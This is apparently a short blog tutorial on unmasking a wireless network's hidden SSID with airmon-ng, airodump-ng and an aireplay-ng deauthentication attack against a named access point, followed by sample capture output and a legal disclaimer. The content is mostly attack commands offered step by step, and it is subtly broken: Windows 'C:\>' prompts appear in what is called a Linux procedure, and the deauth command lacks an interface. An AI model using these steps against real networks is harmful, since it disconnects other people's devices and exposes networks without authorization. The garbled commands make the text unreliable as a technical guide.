A lot of organization hides their Service Set Identifier(SSID) for security purposes. In this post, I will teach you on how to unmask hidden SSID by utilizing airmon-ng on your Linux System.
Aircrack-ng is used to capture packets for monitoring the network traffic. It is used to check if the network is defenseless against any threat.
STEP START
STEP 1 → Run airmon-ng in monitor mode
C:\>airmon-ng start eth1
STEP 2 → Start airodump-ng to display SSID on interface
C:\>airodump-ng --ivs --write capture eth1
BBSID PWR RXQ Beacons #Data #/s CH MB ENC CIPHER ESSID
02:24:2A:BC:89:FE 99 5 61 3 9 1 54e OPN WEP GLOBBE_WIFI
02:24:2A:BC:89:DD 99 9 76 4 0 4 54e OPN SMMART_WIREL
00:12:6C:69:5D:CC 99 0 16 1 0 8 54e WEP WEP SOGOOD_HOTEL
00:33:4F:AE:69:7E 70 70 158 2 0 10 54e WEP WEP <length:10>
BBSID Station PWR Rate Lost Packets Probes
00:33:4F:AE:69:7E 00:16:8A:B2:BD:B1 -1 1-0 0 1
00:33:4F:AE:69:7E 00:1F:4C:CB:B6:BC 77 1d-53 0 6
STEP 3 → use aireplay-ng to display hidden SSID
C:\>aireplay-ng --deauth 11 -a 00:33:4F:AE:69:7E
BBSID PWR RXQ Beacons #Data #/s CH MB ENC CIPHER ESSID
00:33:4F:AE:69:7E 70 70 158 2 0 10 54e WEP WEP HIDDEN_MEEKEY
STEP END
DISCLAIMER: Spydlawr does not promote, encourage, and support any sort of illegal activity. This statement is declaring that the content is for informational or educational purposes only.
